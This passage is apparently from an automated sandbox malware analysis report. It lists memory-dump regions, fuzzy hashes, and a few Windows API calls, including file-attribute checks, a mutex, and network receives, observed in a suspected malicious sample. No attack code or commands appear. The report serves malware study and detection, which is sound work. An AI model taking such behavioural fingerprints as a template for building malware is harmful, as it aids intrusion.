                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 20ca1095d3dd03e741756c9e8bd151548efb070541d18787b20162023b3f07e0
                                                                                                                                                                • Instruction ID: e0a19873544a5644f8f4332d2f57deb271b27ce9b2a845a16b4d1819dc2eabdc
                                                                                                                                                                • Opcode Fuzzy Hash: 20ca1095d3dd03e741756c9e8bd151548efb070541d18787b20162023b3f07e0
                                                                                                                                                                • Instruction Fuzzy Hash: 2F2179327002009BEB18ABA8EC897BDF7A6DFD3310F20421DE4159B6D1C7769680C362
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,000ADA1D,?,?,?,?), ref: 000A87B9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: ee9ed2db217aa8a38ce096765839acd8e9129b6e4c23da10471811b4bbf0a534
                                                                                                                                                                • Instruction ID: b4f2e6b545f64959244e6b8501516b5adb3a6fac5c37f1a52e6b1697bae21eac
                                                                                                                                                                • Opcode Fuzzy Hash: ee9ed2db217aa8a38ce096765839acd8e9129b6e4c23da10471811b4bbf0a534
                                                                                                                                                                • Instruction Fuzzy Hash: E7C08C6801960006EF1C26BC00888AC33854B47BE83F45BC8E0725B1E1CA35E80BD320
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,000ADA1D,?,?,?,?), ref: 000A87B9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: 9567caa6a53ece1603be4a8c817dc8353d7c1aed00e38d04772a1e5562631038
                                                                                                                                                                • Instruction ID: 729c6de3ddcea6d45db59a6d0ec36fdd77c99c0aa5e801d9767e7d7f566195ef
                                                                                                                                                                • Opcode Fuzzy Hash: 9567caa6a53ece1603be4a8c817dc8353d7c1aed00e38d04772a1e5562631038
                                                                                                                                                                • Instruction Fuzzy Hash: 43C08C7801920087EB1C6ABC408882C32859B03B683F04B8CE0325B1E1CB32D407C7A0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2186877014.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_4bf0000_random.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e103305db8d5ff9d3c583d0d90ca2f3e0a485c517854daca7868028902428823
                                                                                                                                                                • Instruction ID: 5aba8139abc7dc723cdc764e1fef3a0003d74b5fe678f5777ed5a19383dac319
                                                                                                                                                                • Opcode Fuzzy Hash: e103305db8d5ff9d3c583d0d90ca2f3e0a485c517854daca7868028902428823
                                                                                                                                                                • Instruction Fuzzy Hash: D311E1FB64D110BEA102E4816F04AF37BAEE5C77303308CA7F54AC6413E2945A4D7131
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2186877014.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_4bf0000_random.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 6aeb924b57a97cc38ba34e1dd6b96cfacb74dd151f58c300a688a723f32db775
                                                                                                                                                                • Instruction ID: 0846bfa025472f8733aa7e3917a0b319a2a36f6b32ec39a67abcad4b0135407d
                                                                                                                                                                • Opcode Fuzzy Hash: 6aeb924b57a97cc38ba34e1dd6b96cfacb74dd151f58c300a688a723f32db775
                                                                                                                                                                • Instruction Fuzzy Hash: 07118EFB64C110BDB152E5862F14AF6A7AEE5C6730330CCA7F54AC6413E2991A4E7131
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2186877014.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_4bf0000_random.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: d64137707ff6869efd0a32ffa9b1bf040d6e9449034dd5a45cc4a8b7a56a4582
                                                                                                                                                                • Instruction ID: bf5755db793c4d196ff4c222a045ddb97068cb5c555b1954f0972a814f19e74e
                                                                                                                                                                • Opcode Fuzzy Hash: d64137707ff6869efd0a32ffa9b1bf040d6e9449034dd5a45cc4a8b7a56a4582
                                                                                                                                                                • Instruction Fuzzy Hash: B6114FFB78D114BD6151A1856F14AF6BA6EE5CA730334C8A7F50BCA413F2942E4D7131
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2186877014.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_4bf0000_random.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 432b524e47bf3315091f86439afb80cbe28f4fbb2ef83d6af20d0adddaa84ee0
                                                                                                                                                                • Instruction ID: 376eeee52b65e2c9553a14a7548f859682070e11218213051d4d66ce64f49e1a
                                                                                                                                                                • Opcode Fuzzy Hash: 432b524e47bf3315091f86439afb80cbe28f4fbb2ef83d6af20d0adddaa84ee0
                                                                                                                                                                • Instruction Fuzzy Hash: A50175FBA8D010BD7142A4866F04AF6AAAEE0C6B3033088A6F50AC6413F2845E4D3031
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2186877014.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_4bf0000_random.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 023c48df1e8e04316894fdc9c278c45b385544b5a63b111c7633ebb562f75e20
                                                                                                                                                                • Instruction ID: 8a3e8bbf87c97d8784f9e8d57499f46f69cf6d9de09d4a2dea30fce4981d0bc3
                                                                                                                                                                • Opcode Fuzzy Hash: 023c48df1e8e04316894fdc9c278c45b385544b5a63b111c7633ebb562f75e20
                                                                                                                                                                • Instruction Fuzzy Hash: 6A0179FB78C124BE7142A0862F14AF6A7AEE4C673033088A7F50BC9813F2942E4D7031
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2186877014.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_4bf0000_random.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 9f1a491494ca281ad2e32cd6f734114318071e91cbf6fe4a0fd52d53e6372ed9
                                                                                                                                                                • Instruction ID: a951f17aaa00c5632dfd3ba3bce605b5d010e82ca7a06b4a2a9eccb2698ffa51
                                                                                                                                                                • Opcode Fuzzy Hash: 9f1a491494ca281ad2e32cd6f734114318071e91cbf6fe4a0fd52d53e6372ed9
                                                                                                                                                                • Instruction Fuzzy Hash: 62019AFB64D0207D7152A5822F14AF7ABAEE4C7B31334C8A7F50AC6403E2890E4E7131
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2186877014.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_4bf0000_random.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 09452e1991882fb5a5f03e0ffb193da6f09a587c80612ad33fa8ed94f2cdfd54
                                                                                                                                                                • Instruction ID: 97a9d619d4bb5027156c057bc7527244779d83b63ff3dc8e90f9223bc4bc9899
                                                                                                                                                                • Opcode Fuzzy Hash: 09452e1991882fb5a5f03e0ffb193da6f09a587c80612ad33fa8ed94f2cdfd54
                                                                                                                                                                • Instruction Fuzzy Hash: 18F09AF764D020BD7110A4822F14ABAA7AEE0C6730334C86BF44AC1403E2994A4D7030
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2186877014.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_4bf0000_random.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 1aa14079fcdb1a97f41c93dd190e06d14a9f7549a1a9c38351acb07e67b6663a
                                                                                                                                                                • Instruction ID: 4a2f1ba07a82bba36bba3deef4c9efae21bb98bb749e0dc63c87accdb00a07f2
                                                                                                                                                                • Opcode Fuzzy Hash: 1aa14079fcdb1a97f41c93dd190e06d14a9f7549a1a9c38351acb07e67b6663a
                                                                                                                                                                • Instruction Fuzzy Hash: C8E012BB68D020BD7010A0823F28AFBA76DE0D6731374CC67F64BC1813E2891A8D7031
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2186877014.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_4bf0000_random.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: ceadb5441c9f4023e13ea81f205637ac1e959399d3dce9cb9bd8efc19a5b44ec
                                                                                                                                                                • Instruction ID: 9ec8d4b1a9a05d7c2df35d8d4fbebd0e3011749d67a4d1f744bd191d042e23d1
                                                                                                                                                                • Opcode Fuzzy Hash: ceadb5441c9f4023e13ea81f205637ac1e959399d3dce9cb9bd8efc19a5b44ec
                                                                                                                                                                • Instruction Fuzzy Hash: A9E046FB248014BD7010A1826F08ABBA72DE0C2730334C867F106C5813E2891A4D7130
                                                                                                                                                                APIs
                                                                                                                                                                • recv.WS2_32(?,?,00000004,00000000), ref: 000AE10B
                                                                                                                                                                • recv.WS2_32(?,?,00000008,00000000), ref: 000AE140
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
